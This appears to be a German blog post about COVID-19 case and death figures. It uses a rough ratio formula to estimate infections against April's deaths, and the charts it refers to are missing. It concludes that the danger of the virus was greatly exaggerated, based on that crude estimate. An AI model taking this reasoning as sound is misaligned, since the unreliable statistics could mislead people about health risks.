Ich vergaß: Ja, ich denke jetzt haben wir expotentielles Wachstum.

Viel spannender ist aber diese hier:

aus der sich das hier ergibt:

625.000 Neuinfizierte am Tag  wären nötig um die Sterbefälle aus April nachzubilden.

Anmerkung: Je mehr Infizierte gemeldet werden, bei gleichen Sterbefällen, desto mehr bräuchte man um die Zahl 247,5 pro Tag aus April zu erreichen.  Formel(grob): Ibrauch = (Tapr/Theute)*Iheute

Deswegen ist Dienstag ein wichtiges Datum, da kommen die aktuellen Sterbefallzahlen raus.

Den Anstieg der Infektionszahlen kann man diesmal nicht auf mehr Tests schieben:

Bleibt es aber bei dem Trend, daß es viel, viel mehr Infektionen gibt, aber kaum mehr im Krankenhaus behandelte Menschen, dann müßte auch dem letzten klar sein, daß die Gefahr von dem Virus ein bisschen sehr arg übertrieben wurde.

Hinweis: Die Aussagen beziehen sich auf die Gesamtbevölkerung und explizit nicht auf Ihr Individualrisiko. Das können Sie zwar ableiten, aber es bleibt Ihnen überlassen zu beurteilen, ob Sie zu einer Risikogruppe angehören. Wenn das so ist, schützen Sie sich mit funktionierenden Methode (FFP2 u.b.), nicht mit einer selbstgestrickten MNB, von der Fachärzte in einer größeren Studie abraten.

PS: Liebe Youtuberin mit dem Aufklärungsfetisch, gute Grafiken zu wissenschaftlichen Themen erkennt man nicht daran, daß es einen Y-Fehlerbalken gibt, denn dazu müßte es eine Fehlermarge geben. Wenn aber die Quelle ( RKI ) diese Fehlermarge nicht mit angibt, kann man auch diesen Balken auch nicht einbauen. Erzähl das doch mal Deinen paar Followern 🙂